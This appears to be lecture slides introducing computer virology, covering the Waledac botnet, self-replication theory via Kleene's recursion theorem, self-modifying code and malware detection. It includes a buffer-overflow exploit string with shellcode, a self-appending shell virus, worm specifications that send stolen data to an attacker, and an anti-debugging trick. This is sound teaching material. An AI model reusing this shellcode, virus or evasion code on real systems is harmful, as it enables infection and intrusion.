An introduction to Computer Virology - Jean-Yves Marion LORIA

An introduction to Computer Virology
      Jean-Yves Marion
      LORIA
      Université de Nancy

      Jean-Yves.Marion@loria.fr

Tuesday 20 December 2011
Some great stories!?

      • Stuxnet

      • Waledac

      • GhostNet
What is malware?

      • Malware is a program with malicious intent

      • Malware can be a virus, a worm, spyware, a botnet ...

      • Giving a mathematical definition is difficult

      ✴ So how does it work?

How do malware infections work?

      • Social engineering leads to infections: "You can’t patch stupidity"

      • Vulnerabilities lead to infections: bugs are unavoidable

      • Mutations
A case study: Waledac

      • Waledac is a botnet

      • Its goal is to send spam

Social engineering

      Excerpts from the report "Infiltrating WALEDAC Botnet’s Covert Operations: Effective Social
      Engineering, Encrypted HTTP2P Communications, and Fast-Fluxing Networks":

      • "[...] and other similar sexual-enhancement drugs. However, there are times when WALEDAC
        spews out spam that are neither pharmaceutical in nature nor carry other malware. This
        suggests that it may have been hired by third parties or clients as a spamming service.
        These regular WALEDAC spam are also documented in detail in Appendix B.
        The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far."

      • Appendix A, WALEDAC Social Engineering Tactics: "[...] this report was written, WALEDAC
        was seen to have used eight social engineering attacks in an effort to make would-be
        victims run the malware. WALEDAC [...] with the Christmas Ecard ploy."

      • "With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC
        started sending out spam for its new campaign. The email campaign then carried the bad
        news that “Obama refused to be the next president.”"

      Figures shown on the slide:
            • Figure 1. Christmas ecard spam
            • Figure 2. Christmas ecard website
            • Figure 2. Timeline of WALEDAC activities
            • Figure 5. WALEDAC email carrying the news that Obama refuses to be the next U.S. president
            • Figure 6. WALEDAC rips text off from Obama’s website, bearing false news that he no
              longer wants to be the president
Waledac

      • Use of a dropper

            • Conficker or other malware is used to install Waledac

      • Binaries are packed with UPX and homemade packers

      • Encryption technologies: RSA & AES (OpenSSL)

      • Sends emails from templates

      • Scans files to find email addresses and passwords

      • Downloads binaries and updates itself

An email template

      Received: from %^C0%^P%^R3-6^%:qwertyuiopasdfghjklzxcvbnm^%^% ([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%])
                by %^A^% with Microsoft SMTPSVC(%^Fsvcver^%); %^D^%
      From: "%^Fmynames^% %^Fsurnames^%"
      User-Agent: Thunderbird %^Ftrunver^%
      To: %^0^%
      Subject: %^Fjuly^%

      http://%^P%^R26^%:qwertyuiopasdfghjklzxcvbnmeuioa^%.%^Fjuly_link^%/^%

Packer codes

               Two different versions obtained after a few hours
3-tier movie of an attack

      • Social engineering, targeted attack

      • A dropper

      • Client-side exploit

      • Install malware

Software bugs

Software Bugs (client side exploit)

      • Data are programs

      • Bugs are doors if they are exploitable (0-days)

      • A bug-free system is safe

      • But systems contain bugs ... and no general procedure can certify that a program
          is bug-free, as a consequence of the undecidability of the halting problem (Turing)

Vulnerabilities : a buffer-overflow

                                                                                                       EIP \xFFF0
       void vulnerable(char *user_data) {
         char buffer[4];
         strcpy(buffer, user_data);
                                                                                                      EBP \xE000
                                                                                                               \x90\x90
       }
                                                                                                       ...

   vulnerable(«AAAAAAAAAAAAAAAA\xec\xf2\xff\xbf
                                                                                                       ...     \x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
                                                                                                       ...     \x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90

                                                                                                      buffer
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e
   \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
   \x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls»)                                      Stack

Vulnerabilities : a buffer-overflow

       void vulnerable(char *user_data) {
         char buffer[4];
         strcpy(buffer, user_data);
       }

       Stack (figure): EIP \xFFF0, EBP \xE000, ..., buffer; the overwritten slots hold \x90\x90

     Return at the address FFF0

Bugs
             • A buffer overflow transforms a program into a self-modifying program

                         Wave 1                           Wave 1

                                                          Wave 2

                                             Wave 2 is the code created
                                             by buffer overflow in wave 1
What is malware?

      • Infect systems by self-replication

            • Mutation

      • Protect itself

            • Obfuscation

            • Self-modification

      • Detection

            • Undecidable
Outline

      • Foundation 1 : Self-replication

      • Foundation 2 : Self-modification

      • Detection

            • Detection by string matching

            • Behavioral detection

            • Botnet neutralization

Foundation 1 : Self-Replication

Self-replicating cellular automata

        Von Neumann (1952), Burks

                                       Codd, Langton

Cohen’s formalization (1985)

           Cohen’s Virus (1985)

                          v1 v2 ... vn                    v’1 v’2 ... v’m

      • Consider a Turing machine M

      • and a viral set V

      • When the TM M reads v ∈ V, M produces v’ ∈ V

      • (M, V) is a description of a virus
Self-Replication
      • A virus has self-replicating capacity

      • Reflexive property of programming languages, based on a

            • Pointer mechanism to program code, e.g. $0
                           # for each file FName in the current path
                           for FName in *; do
                             # if FName is not me
                             if [ $FName != $0 ]; then
                               # add myself at the end of FName
                               cat $0 >> $FName
                             fi
                           done

                                                Figure 2: An example of ecto-symbiote

                           We see that by iterating this virus, it will make copies of itself [...]
                           system runs out of memory.
Self-Replication

            • Program encoding
              (Ken Thompson, «Reflections on Trusting Trust», CACM 1984)

                    main() { char *s="main() { char *s=%c%s%c; printf(s,34,s,34); }"; printf(s,34,s,34); }

            • See also quines
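
The same program-encoding trick can be sketched in Python. The two-line program stored in QUINE below is a standard quine; the names QUINE and run_and_capture are illustrative helpers (they do not come from the slides) and only serve to check that the program prints exactly its own text.

```python
import contextlib
import io

# The two-line quine, held as text so that it can be executed and compared.
# Line 1 stores a template of the whole program in s; line 2 prints the
# template filled with its own representation.
QUINE = "s = 's = %r\\nprint(s %% s)'\nprint(s % s)\n"


def run_and_capture(source: str) -> str:
    """Execute `source` in a fresh namespace and return what it prints."""
    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        exec(source, {})
    return buffer.getvalue()


if __name__ == "__main__":
    # The output of the program is the program itself.
    print(run_and_capture(QUINE) == QUINE)
```

The `%r` placeholder plays the role of `%c%s%c` with the quote character 34 in the C version: it re-inserts the string together with its quotes.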

Self-Replication
            • Fixed point combinators (functional programming languages)

                                    Y F = F (Y F)

            • Computability: Kleene's recursion theorem (1938)
                  • See the book by N. D. Jones for a programming point of view
                  • See the books by Rogers or P. Odifreddi for a computability point of view
                  • See the marvelous books by R. Smullyan ...
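
A fixed point combinator can be tried out directly in Python. Because Python evaluates arguments eagerly, the sketch below uses the eta-expanded variant usually called the Z combinator rather than Y itself; the names Z and fact are illustrative and not taken from the slides.

```python
def Z(f):
    """Fixed point combinator for a strict language: Z(f) behaves like f(Z(f))."""
    return (lambda x: f(lambda v: x(x)(v)))(lambda x: f(lambda v: x(x)(v)))


# The factorial is written without referring to its own name:
# `self` stands for the function being defined.
fact = Z(lambda self: lambda n: 1 if n == 0 else n * self(n - 1))

if __name__ == "__main__":
    print(fact(5))
```

The inner `lambda v: x(x)(v)` delays the self-application until an argument arrives, which is what keeps the definition from looping forever under eager evaluation.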

A compilation point of view

                               A worm X scenario

      • The victim is led by social engineering to open an email attachment

      • X scans for information

      • X extracts a list of email addresses of targeted people

      • X sends a copy of itself by email

Worm X specification
         WormX(v,out)
         { info := extract(out);       // extract information
           send(«badguy»,info);        // send information
           @bk := findAddress(out);    // find email addresses
           send(@bk,v);                // send worm X to @bk
         }

                         How to compile Worm X?

Program Semantics
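        Semantics

               $\llbracket P \rrbracket(d)$ is the value of $P$ on the environment $d$

                                 $\llbracket \_ \rrbracket : \mathrm{Programs} \times D^{*} \to D^{*}$

                where a value of $D^{*}$ is a system environment.
                From the above example

                            $\llbracket \mathrm{send} \rrbracket(\text{spider@man.com}, \text{``Hello''}, Out) = \mathrm{cons}(\mathrm{cons}(\text{spider@man.com}, \text{``Hello''}), Out)$

                where $Out$ is an output stream.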
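
The equation for send can be read as a purely functional update of the environment. The sketch below models an output stream as nested pairs, with None standing for the empty stream; this encoding and the names cons, send and Env are assumptions made for illustration, not definitions from the slides.

```python
from typing import Any, Optional, Tuple

# An environment is either empty (None) or a cons cell (head, tail).
Env = Optional[Tuple[Any, Any]]


def cons(head: Any, tail: Any) -> Tuple[Any, Any]:
    """Build a pair, as in the cons of the slide."""
    return (head, tail)


def send(address: str, message: str, out: Env) -> Env:
    """Semantics of send: push the pair (address, message) onto the stream."""
    return cons(cons(address, message), out)


if __name__ == "__main__":
    out = send("spider@man.com", "Hello", None)
    print(out)
```

Nothing is transmitted here: the "system environment" is just a value, and send returns a new value, which is what lets the later slides state worm specifications as equations.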

Solve a fixed point equation

         Suppose that out is a system entry point.
         A specification of ILoveYou is:
       love(v,out) {
         info := find(out); // find information
         out := send(cons(‘‘badguy@dom.com’’,nil),info);
         @bk := extract(out); // extract addresses
         out := send(@bk,v); // send virus to @bk
         return out;
       }
         v should behave as ILoveYou.

        We have to solve a fixed point equation:

                         $\llbracket W \rrbracket(out) = \llbracket WormX \rrbracket(W, out)$

       W is a worm satisfying the specification WormX

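      A general solution to fixed point equations is given by Kleene’s recursion theorem.

         Theorem (Kleene (1938))
      If p is a program, then there is a program e such that:

                                   $\llbracket e \rrbracket(x) = \llbracket p \rrbracket(e, x)$

     Proof: let d be a program such that, writing d(x) for the program $\llbracket d \rrbracket(x)$,

                 $\llbracket d(x) \rrbracket(y) = \llbracket x \rrbracket(x, y)$

         and let q be a program such that

                 $\llbracket q \rrbracket(y, x) = \llbracket p \rrbracket(\llbracket d \rrbracket(y), x)$

         Set e = d(q). Then

                 $\llbracket d(q) \rrbracket(x) = \llbracket q \rrbracket(q, x) = \llbracket p \rrbracket(\llbracket d \rrbracket(q), x) = \llbracket p \rrbracket(e, x)$

      A solution of the ILoveYou equation

                                 $\llbracket v \rrbracket(out) = \llbracket love \rrbracket(v, out)$

         Set v = e where p = love.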
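
The construction behind the theorem can be illustrated on a harmless instance. In the sketch below, programs are Python source texts that define main(x), and p only reports the length of the program text it receives; the functions fixed_point and run, and the encoding of programs as strings, are assumptions made for illustration and not the construction used in the slides.

```python
def fixed_point(p_source: str) -> str:
    """Return the text of a program e such that running e on x gives p(e, x).

    `p_source` must define a function p(e, x), where e is a program text.
    """
    template = (
        "{p_source}\n"
        "TEMPLATE = {template!r}\n"
        "P_SOURCE = {p_source!r}\n"
        "def main(x):\n"
        "    # Rebuild my own source text, then hand it to p.\n"
        "    me = TEMPLATE.format(p_source=P_SOURCE, template=TEMPLATE)\n"
        "    return p(me, x)\n"
    )
    return template.format(p_source=p_source, template=template)


def run(program: str, x):
    """Semantics of a program text: execute it and apply its main to x."""
    namespace = {}
    exec(program, namespace)
    return namespace["main"](x)


# A harmless p: report the length of the program it is given, next to x.
P_SOURCE = "def p(e, x):\n    return (len(e), x)\n"

e = fixed_point(P_SOURCE)

if __name__ == "__main__":
    # Checks the equation [[e]](x) = [[p]](e, x) on one input.
    print(run(e, 7) == (len(e), 7))
```

The generated text carries a template of itself, exactly as a quine does, so main can recompute its own source and pass it to p without reading any file.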

Malware construction from a specification

      The Kleene fixed point is a solution of

                         $\llbracket W \rrbracket(out) = \llbracket WormX \rrbracket(W, out)$

      We can construct a virus which satisfies a given specification.
Self-replicating malware compiler

               There is a compiler Comp such that W is the
               worm satisfying the specification Worm:

                         $\llbracket Comp \rrbracket(Worm) = W$

                         $\llbracket W \rrbracket(out) = \llbracket Worm \rrbracket(W, out)$
Self-replication with mutations

      We can generate malware which satisfies the specification Worm and mutates
      automatically at each execution:

                         $\llbracket e \rrbracket(out) = \llbracket Worm \rrbracket(Mutate(e), out)$

      where Mutate is a code mutation procedure.

      The construction of e is given by Kleene’s theorem.

Some historical facts

      • 1983: the first official virus, on Vax-PDP 11
      • 1988: the first worm, which infects 6000 machines
      • 1990: Dark Avenger mutation engine (Bulgaria)
      • 1995: macro virus
      • 2000: worm “I Love You”
      • 2001: Palm Pilot virus
Self-replicating compiler with mutations

         There is a compiler Comp such that, for every worm specification Worm and
         mutation procedure Mutate:

                         $\llbracket Comp \rrbracket(Worm) = W$

                         $\llbracket W \rrbracket(out) = \llbracket Worm \rrbracket(Mutate(W), out)$
References
      • PhD thesis of F. Cohen
      • L. Adleman (1988), who coined the word «virus»
      • Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract
        Computer Virology from a Recursion Theoretic Perspective.
        Journal in Computer Virology (3-4): 45-54 (2006)

                                                         «A virus is a virus» (Lwoff)
Foundation 2 : Self-modification

Data is code

      Today’s computers are built from two key
      principles:
      1) Instructions are represented as numbers
      2) Programs can be stored in memory to be read
      or written just as numbers
                                (Patterson & Hennessy)

Applications of self-modifying programs

      • Malware mutations

      • Code protection (digital rights)

      • Compression and packers

      • Just in Time compilers

A simple self-modification

        A simple decryption loop

                          Wave 1       {@a,@b,@c,@d}

                              jnz @b

                          Wave 2         {@offset}

Ex: Packer UPX

                         UPX (Packer)
                          Hello.exe
                                        Wave 1

                                        Wave 2

Another example of self-modification

        Proxy =
         { X:= Read();
           eval(X);}                     An external input is run

                   An interpreter of a known or unknown
                   language is used to execute some data

Analyzing self-modifying programs

      • Complex to design and to analyze

      • Program flow may change

      • In usual semantics, program and data are separated

        Defined by structural induction on P:   $P \vdash \sigma \to \sigma'$
Dynamic analysis of self-modifying programs

      • Instrument a program

      • Monitor memory accesses: read (R), write (W), and execution (X)

            • We follow nested self-modification

            • We detect some code protection

            • We detect code patterns

                  • code decryption

                  • Integrity checking

                  • ....
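
The R/W/X monitoring above can be sketched on a recorded trace. The model below is deliberately simplified and is an assumption for illustration, not the algorithm of any particular tool: a trace is a list of (access, address) events, and a new wave starts whenever the program executes an address that was written during the current wave. The name count_waves and the sample addresses are hypothetical.

```python
from typing import Iterable, Tuple


def count_waves(trace: Iterable[Tuple[str, int]]) -> int:
    """Count code waves in a trace of ("R" | "W" | "X", address) events."""
    wave = 1
    written = set()  # addresses written since the current wave started
    for access, address in trace:
        if access == "W":
            written.add(address)
        elif access == "X" and address in written:
            # Executing freshly written memory: the program has just
            # produced new code, so a new wave begins.
            wave += 1
            written.clear()
    return wave


if __name__ == "__main__":
    trace = [
        ("X", 0x1000),  # wave 1 runs
        ("R", 0x2000),
        ("W", 0x2000),  # wave 1 writes (for example, decrypts) code
        ("X", 0x2000),  # wave 2 starts
        ("W", 0x3000),
        ("X", 0x3000),  # wave 3 starts
    ]
    print(count_waves(trace))
```

Clearing the written set at each new wave is what makes nested self-modification show up as successive waves instead of a single one.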

Example: ACProtect
      • hostname packed with ACProtect

      [Figure not recoverable from the extraction]
Exemple
      Themida  (4/5)
          • hostname packé avec Themida

                                                                   
                                                                     

                                                                   
                                                                     

                                                                                  
                                                                                     

                                  
                                    

                                                        
                                                        

                                                                               
                                                                                

                             
                                

                                                                              
                                                                                

                                                                                      
                                                                                      

                                                                                            
                                                                                              

Experiments with TraceSurfer
      • TraceSurfer is based on Pin (Intel)
      • 95 613 binaries, 80% success, 1400 binaries/h
      • Experimental results (1/3): number of code waves detected over the whole set of binaries
          ◦ max: 56 waves
      [Figure: number of waves detected, max = 56]

Related works

      • TraceSurfer, based on Pin (Intel)

      • BitBlaze (Berkeley): TEMU, VINE, ...

      • DynamoRIO, Ether, Metasm

      • Methods related to data tainting

Malware detection

Malware detection by string scanning

      • Signature is a regular expression denoting a sequence of bytes

                                      Worm.Y
                         Your mac is now under our control !

      • Signature: «Your * is now under our control !»

                                      Worm.Y
                         Your PC is now under our control !
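
The signature above can be sketched as a byte-level regular expression. This is only an illustration: the helper name `scan` and the choice to read the wildcard `*` as 1 to 16 arbitrary bytes are assumptions, not something stated on the slide.

```python
import re

# Signature "Your * is now under our control": the wildcard is modelled
# (assumption) as 1 to 16 arbitrary bytes, matched non-greedily.
SIGNATURE = re.compile(rb"Your .{1,16}? is now under our control", re.DOTALL)

def scan(data: bytes) -> bool:
    """Return True if the byte sequence contains the signature."""
    return SIGNATURE.search(data) is not None

# Hypothetical samples: two variants of Worm.Y and one benign string.
samples = {
    "Worm.Y (mac variant)": b"\x90\x90Your mac is now under our control !",
    "Worm.Y (PC variant)": b"Your PC is now under our control !\x00",
    "benign": b"Your order is now on its way",
}
for name, data in samples.items():
    print(name, "->", scan(data))
```

Both variants share one signature because only the word between "Your" and "is now" differs.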

Malware detection by string scanning

           • Signature is a regular expression denoting a sequence of bytes
           • Database of known signatures

           Excerpt shown on the slide (VIRUS INFORMATIQUES, source: Filiol), translated from French:

           Dynamic mode: the antivirus is resident and continuously monitors the activity of the
           operating system, the network and the user. It takes control before any action and tries
           to determine whether that action carries a viral risk. This mode is resource-hungry and
           requires relatively powerful machines, so that it does not become a handicap and push the
           user (as happens too often) to disable it in favor of [...].

           The most effective modern antivirus products are supposed to combine several techniques
           (implemented in modules called engines) to reduce the risk to a minimum. These techniques
           fall into two groups:

           • Form analysis, commonly called signature search. The latter name is actually improper,
             because it covers only a very restricted approach to form analysis, which groups many
             techniques. Form analysis examines code as a sequence of bits or bytes, outside any
             execution context. It rests on the notion of detection scheme ([9], chapter 2)
             SD = {S_M, f_M}, made of a detection pattern S_M (relative to a malicious code M) and a
             detection function f_M. The task is to search, in different ways (characterized by the
             detection function) and relative to one or more databases (sets of detection schemes),
             for bit or byte strings S_M of varying structural complexity, recorded in these
             databases as characteristic of a given malicious code M.
           • Behavioral analysis, in which an executable file is analyzed in its execution context.
             This is functional detection: the "behaviors", or actions, of the code are studied. In
             this context, detection rests on the notion of detection strategy [9].

           Definition 5 (detection strategy): a detection strategy relative to a malicious code M
           is the triple DS = {S_M, B_M, f_M}.

           Example: consider the detection of a recent, well-known worm such as Bagle.P. The list of
           the different detection patterns is given in Table 1. The detection function is the
           logical AND function. This means that, for the worm to be detected, the bytes ...

           Table 1: Viral pattern of I-Worm.Bagle.P (source: Filiol)

           Product               Signature size (bytes)   Signature (indices)
           Avast                 8                        12,916 → 12,919; 12,937 → 12,940
           AVG                   14,575                   533 → 536 - 538 - ...
           Bit Defender          8,330                    0 - 1 - 60 - 128 - 129 - 134 - ...
           Dr Web                6,169                    0 - 1 - 60 - 128 - 129 - 134 - ...
           eTrust/Vet            1,284                    0 - 1 - 60 - 128 - 129 - 134 - ...
           eTrust/Inoculate IT   1,284                    0 - 1 - 60 - 128 - 129 - 134 - ...
           F-Secure 2005         59                       0 - 1 - 60 - 128 - 129 - 546 - ...
           G-Data                54                       0 - 1 - 60 - 128 - 129 - 546 - ...
           KAV Pro               59                       identical to that of F-Secure 2005
           McAfee 2006           12,127                   0 - 1 - 60 - 128 - 129 - 134 - ...
           NOD 32                21,849                   0 - 1 - 60 - 128 - 129 - 132 - 133 - ...
           Norton 2005           6                        0 - 1 - 60 - 128 - 129 - 134
           Panda Tit. 2006       7,579                    0 - 1 - 60 - 134 - 148 - 182 - 209...
           Sophos                8,436                    0 - 1 - 60 - 128 - 129 - 134 - 148...
           Trend Office Scan     88                       0 - 1 - 60 - 128 - 129 - ...
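
A detection scheme made of byte positions plus a logical AND detection function can be sketched as follows. The offsets echo the indices of Table 1, but the byte values, the names `PATTERN`, `detect_and` and `make_sample`, and the sample data are all invented for illustration.

```python
from typing import Dict

# Hypothetical detection pattern S_M: byte offsets mapped to expected values.
# Offsets echo Table 1 (0, 1, 60, 128, 129); the byte values are invented.
PATTERN: Dict[int, int] = {0: 0x4D, 1: 0x5A, 60: 0x80, 128: 0x50, 129: 0x45}

def detect_and(data: bytes, pattern: Dict[int, int]) -> bool:
    """Detection function f_M = logical AND: every indexed byte must match."""
    return all(i < len(data) and data[i] == b for i, b in pattern.items())

def make_sample(pattern: Dict[int, int], size: int = 200) -> bytearray:
    """Build a zero-filled buffer carrying the pattern bytes (toy 'infected' file)."""
    buf = bytearray(size)
    for i, b in pattern.items():
        buf[i] = b
    return buf

infected = make_sample(PATTERN)
variant = bytearray(infected)
variant[60] ^= 0xFF   # changing one indexed byte is enough to evade an AND scheme

print(detect_and(bytes(infected), PATTERN))
print(detect_and(bytes(variant), PATTERN))
```

With an AND function, a short pattern (Norton's 6 bytes in Table 1, for instance) leaves very few bytes for a malware author to change.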
Malware detection by string scanning
          Pros:
          • Accuracy: low false-positive rate
             ➡ programs which are not malware are rarely flagged

          • Efficiency: fast string-matching algorithms
             ➡ Karp & Rabin; Knuth, Morris & Pratt; Boyer & Moore

          Cons:
          • Signatures are constructed quasi-manually

          • Vulnerable to malware protections
             ➡ Mutations

             ➡ Code obfuscations
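
To make the efficiency point concrete, here is a minimal sketch of the Karp & Rabin rolling-hash search, one of the algorithms named above. The function name and the parameters `base` and `mod` are illustrative choices, not taken from any antivirus engine.

```python
def rabin_karp(text: bytes, pattern: bytes, base: int = 256, mod: int = 1_000_003) -> int:
    """Return the first offset of pattern in text, or -1 (rolling-hash search)."""
    n, m = len(text), len(pattern)
    if m == 0:
        return 0
    if m > n:
        return -1
    high = pow(base, m - 1, mod)          # weight of the byte leaving the window
    p_hash = w_hash = 0
    for i in range(m):
        p_hash = (p_hash * base + pattern[i]) % mod
        w_hash = (w_hash * base + text[i]) % mod
    for start in range(n - m + 1):
        # Compare bytes only when the hashes agree, to rule out collisions.
        if w_hash == p_hash and text[start:start + m] == pattern:
            return start
        if start + m < n:
            # Slide the window: drop text[start], append text[start + m].
            w_hash = ((w_hash - text[start] * high) * base + text[start + m]) % mod
    return -1

print(rabin_karp(b"xxYour PC is now", b"PC"))
print(rabin_karp(b"xxYour P C is now", b"PC"))
```

The second call shows the weakness listed under the cons: inserting a single byte into the matched string defeats an exact-match signature.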

Detection by integrity check

      • Identify a file using a hash function

      [Figure: files → hash function → hash numbers a, b (numerical fingerprints)]

      • Cons:
        • File systems are updated, so numerical fingerprints change
        • Difficult to maintain in practice
        • A file may change yet keep the same numerical fingerprint (hash collisions)
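
A minimal sketch of an integrity check, assuming SHA-256 as the hash function (the slide does not name one) and a temporary file as stand-in data. The helper names `fingerprint` and `changed_files` are hypothetical.

```python
import hashlib
import os
import tempfile

def fingerprint(path: str) -> str:
    """Return the SHA-256 digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def changed_files(baseline: dict) -> list:
    """List paths whose current fingerprint differs from the recorded one."""
    return [p for p, digest in baseline.items() if fingerprint(p) != digest]

# Demo on a temporary file (hypothetical data).
with tempfile.TemporaryDirectory() as d:
    path = os.path.join(d, "app.bin")
    with open(path, "wb") as f:
        f.write(b"original contents")
    baseline = {path: fingerprint(path)}
    before = changed_files(baseline)      # nothing modified yet
    with open(path, "ab") as f:
        f.write(b" + appended code")      # simulated infection
    after = changed_files(baseline)

print(before, after)
```

A legitimate software update would trigger exactly the same alert, which is the maintenance problem listed in the cons.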

Behavioral analysis

          • Monitor program interactions (sys calls, network calls, ...)
          • Detection of program behavior from execution traces
          • Functionalities are expressed at a high level

          Trace automata
          • Trace language of a program: generally undecidable.
          • Approximation by a regular language: using trace collection or static analysis.
          =⇒ A trace automaton is a finite-state approximation of some trace language.

          [Figure: trace automaton over the calls IcmpSendEcho, GetLogicalDriveStrings,
           GetDriveType, FindFirstFile, FindNextFile]

          • Information leaks can be detected
          • Cons:
            • Today behavioral analysis is dynamic, which implies monitoring all
              processes or running programs in sandboxes.
            • It slows down the system
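
Matching an execution trace against a behavior pattern can be sketched with a small finite automaton. The API names come from the slide's figure, but the shape of the automaton, the state names and the rule of skipping unrelated calls are assumptions made for illustration.

```python
from typing import Dict, Iterable, Set, Tuple

# Hypothetical behavior pattern "enumerate drives, then walk files", written as
# a finite automaton over Windows API names taken from the slide's figure.
TRANSITIONS: Dict[Tuple[str, str], str] = {
    ("q0", "GetLogicalDriveStrings"): "q1",
    ("q1", "GetDriveType"): "q2",
    ("q2", "FindFirstFile"): "q3",
    ("q3", "FindNextFile"): "q3",
}
ACCEPTING: Set[str] = {"q3"}

def matches(trace: Iterable[str], start: str = "q0") -> bool:
    """Run the automaton over a trace, skipping calls that have no transition."""
    state = start
    for call in trace:
        state = TRANSITIONS.get((state, call), state)
    return state in ACCEPTING

suspicious = ["IcmpSendEcho", "GetLogicalDriveStrings", "GetDriveType",
              "FindFirstFile", "FindNextFile", "FindNextFile"]
benign = ["FindFirstFile", "FindNextFile"]
print(matches(suspicious), matches(benign))
```

Skipping unrelated calls is a crude form of trace abstraction: only the calls relevant to the pattern drive the automaton.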

Code protection

      Detection is hard because malware is protected

      1. Obfuscation

      2. Cryptography

      3. Self-modification

      4. Anti-analysis tricks

Protections: Self-Modification and Obfuscation
      • A lot of malware families use home-made obfuscations, like packers, to
        protect their binaries, following a standard model.
      • The obfuscation mechanism is modified for each new distributed binary.
      [Figure: standard packer model: EP → unpacking code → OEP → original code]
      • Example: Win32.Swizzor's packer
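
The packer model (a stub that decodes the original code in memory and then jumps to it) can be imitated with a harmless toy. Everything here is an assumption made for illustration: the one-byte XOR "packing", the names `pack` and `run_packed`, and the payload, which only returns a string.

```python
# Harmless stand-in for the original code.
PAYLOAD_SRC = b"def payload():\n    return 'original code reached'\n"

def pack(src: bytes, key: int) -> bytes:
    """'Pack' the payload: XOR every byte with a one-byte key (toy scheme)."""
    return bytes(b ^ key for b in src)

def run_packed(blob: bytes, key: int) -> str:
    """Unpacking stub: decode the blob in memory, then jump to the payload."""
    namespace: dict = {}
    exec(pack(blob, key).decode(), namespace)   # XOR is its own inverse
    return namespace["payload"]()

binary_a = pack(PAYLOAD_SRC, 0x21)
binary_b = pack(PAYLOAD_SRC, 0x5C)   # same payload, different key

print(run_packed(binary_a, 0x21))
print(binary_a == binary_b, b"payload" in binary_a)
```

Changing the key for each distributed copy gives byte-wise different binaries with identical behavior, which is why a string signature computed on the packed form does not carry over.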
Code protection

      Detection is hard because malware is protected.

      Some interesting protection methods:

      1. Obfuscation

      2. Cryptography

      3. Self-modification

      4. Anti-analysis tricks

Obfuscation
      • Function calls
Code protection

      1. Obfuscation

      2. Cryptography

      3. Self-modification

      4. Anti-analysis tricks

Cryptography

      • The dropper of Agobot botnet

http://quequero.org/AgoBot_Botnet_Reverse_Engineering

Code protection

      1. Obfuscation

      2. Cryptography

      3. Self-modification

      4. Anti-analysis tricks

Self-modification

      • Packers ... already seen previously ...

Code protection

      1. Obfuscation

      2. Cryptography

      3. Self-modification

      4. Anti-analysis tricks

Anti-debugging tricks

                                 MOV EAX,-1                     ; invalid system service number

                                 INT 2E                         ; legacy Windows system-call interrupt

                                 CMP WORD PTR DS:[EDX-2],2ECD   ; do the 2 bytes before EDX encode INT 2E?

      • Invoke interrupt 2E with an invalid EAX value

      • Normal behavior: EDX contains the address of the next instruction

      • Test whether EDX-2 points to the opcode of INT 2E (bytes CD 2E, i.e. the little-endian word 2ECD)

      • If a debugger is running, then EDX is equal to 0xFFFFFFFF
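
The comparison against 2ECD can be checked on a byte buffer standing in for memory. This is only a model of the test, not of the interrupt itself: the function name `looks_like_int2e` and the buffer layout are assumptions. On x86, `INT n` is encoded as the byte CD followed by the interrupt number.

```python
INT_2E = bytes([0xCD, 0x2E])            # machine code of INT 2E: opcode CD, operand 2E

def looks_like_int2e(memory: bytes, edx: int) -> bool:
    """Mimic CMP WORD PTR [EDX-2], 2ECD on a byte buffer standing in for memory."""
    if edx < 2 or edx > len(memory):
        return False                     # e.g. EDX = 0xFFFFFFFF under a debugger
    word = int.from_bytes(memory[edx - 2:edx], "little")
    return word == 0x2ECD

# MOV EAX,-1 (B8 FF FF FF FF), then INT 2E, then a NOP as filler.
code = b"\xB8\xFF\xFF\xFF\xFF" + INT_2E + b"\x90"

print(looks_like_int2e(code, 7))            # EDX = address right after INT 2E
print(looks_like_int2e(code, 0xFFFFFFFF))   # value reported when debugged
```

The bytes CD 2E read as a 16-bit little-endian word give 2ECD, which is why the constant in the CMP looks reversed.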

Consequences of Code protection

      1. Difficult for a human analyst to understand malware code

            1. OllyDbg

            2. IDA Pro

Welcome to Swizzorland !!

Consequences of Code protection

      1. Difficult for a human analyst to understand malware code

            1. OllyDbg

            2. IDA Pro

      2. Difficult to design automatic tools

            1. Static analysis

                  • Abstract interpretation

            2. Dynamic analysis

A cruel world

          Theorem: Let v be a virus. The set of viruses which are obtained from v by
          mutation is not decidable (not computable).

        A consequence of Rice's theorem

          Theorem (Rice): Let P be a non-trivial property of the functions computed by programs.
          Then the set of programs which satisfy P is not decidable.

        Idea of the proof: construct a reduction from the halting problem.
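
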